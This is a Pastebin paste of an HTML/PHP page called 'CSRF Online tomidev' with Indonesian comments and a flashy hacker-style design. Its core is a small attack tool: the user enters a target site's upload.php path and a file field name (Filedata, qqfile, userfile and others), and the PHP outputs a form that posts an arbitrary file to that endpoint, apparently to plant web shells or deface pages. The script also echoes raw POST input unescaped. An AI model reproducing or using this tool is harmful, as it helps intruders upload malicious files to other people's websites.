Advertisement
Tomidev

Csrf online code

Feb 6th, 2022
18
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.91 KB | None | 0 0
  1. <html>
  2. <head>
  3. <title>CSRF Online tomidev</title>
  4. <link rel="icon" href="logo1.png">
  5. <link href="https://fonts.googleapis.com/css?family=PT+Sans+Narrow|Just+Another+Hand" rel="stylesheet">
  6. <link href="http://fonts.googleapis.com/css?family=Ubuntu+Mono:400,700" rel="stylesheet" type="text/css">
  7.  
  8. <!-- Meta Data -->
  9. <meta content='CSRF Online tomidev' name='title'>
  10. <meta content='CSRF Online tomidev' name='description'>
  11. <meta content='CSRF Online' name='keywords'>
  12. <meta content='CSRF Online' name='Abstract'>
  13. <!-- Akhir Meta Dta -->
  14.  
  15. <script src="https://cdn.rawgit.com/bungfrangki/efeksalju/2a7805c7/efek-salju.js" type="text/javascript"></script>
  16. </head>
  17. <!-- Akhir Head -->
  18.  
  19. <!-- Body -->
  20. <body bgcolor="black">
  21.  
  22. <!-- Style Css -->
  23. <style>
  24.  
  25. @keyframes shake {
  26.  
  27. 0% { transform: translate(1px, 1px) rotate(0deg); }
  28.  
  29. 10% { transform: translate(-1px, -2px) rotate(-1deg); }
  30.  
  31. 20% { transform: translate(-3px, 0px) rotate(1deg); }
  32.  
  33. 30% { transform: translate(3px, 2px) rotate(0deg); }
  34.  
  35. 40% { transform: translate(1px, -1px) rotate(1deg); }
  36.  
  37. 50% { transform: translate(-1px, 2px) rotate(-1deg); }
  38.  
  39. 60% { transform: translate(-3px, 1px) rotate(0deg); }
  40.  
  41. 70% { transform: translate(3px, 1px) rotate(-1deg); }
  42.  
  43. 80% { transform: translate(-1px, -1px) rotate(1deg); }
  44.  
  45. 90% { transform: translate(1px, 2px) rotate(0deg); }
  46.  
  47. 100% { transform: translate(1px, -2px) rotate(-1deg); }
  48.  
  49. }
  50.  
  51. .x{
  52.  
  53. animation: shake 1s;
  54.  
  55. animation-iteration-count: infinite;
  56.  
  57. font-family: 'Just Another Hand', cursive;
  58.  
  59. font-size:58px;
  60.  
  61. color: white;
  62.  
  63. }
  64.  
  65. .z{
  66.  
  67. font-family: 'PT Sans Narrow', cursive;
  68.  
  69. font-size:20px;
  70. color: white;
  71. }
  72.  
  73. </style>
  74. <!-- Akhir Style -->
  75. <center>
  76. <div class="x">Welcome To CSRF tomi dev</div>
  77. <div class="z">
  78.  
  79. <marquee width="55%" direction="right" behavior="alternate" scrollamount="20">waduhhh ada heker</marquee>
  80. </div>
  81. <br><br>
  82. <img src="https://d.top4top.io/p_2226n7pox0.png" width="250" alt="">
  83.  
  84. <!-- Post Data -->
  85. <form method="post">
  86. <font size="6" color="white" face="arial" style="text-shadow: 1px 0px 5px red;">
  87. URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/[path]/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
  88. POST File: <font color="white"> <input type="text" name="pf" size="50" height="10" placeholder="Filedata / files[] / qqfile / userfile / dll" style="margin: 5px auto; padding-left: 5px;" required><br></font>
  89. <input type="submit" name="d" value="Kunci Target!!!">
  90. </form>
  91. <?php
  92. $url = $_POST['url'];
  93. $pf = $_POST['pf'];
  94. $d = $_POST['d'];
  95. if($d) {
  96. echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Genjot cuks!'></form";
  97. }
  98. ?>
  99.  
  100. </center>
  101.  
  102. <!-- Akhir Post Data -->
  103. </body>
  104. </html>
  105.  
  106.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement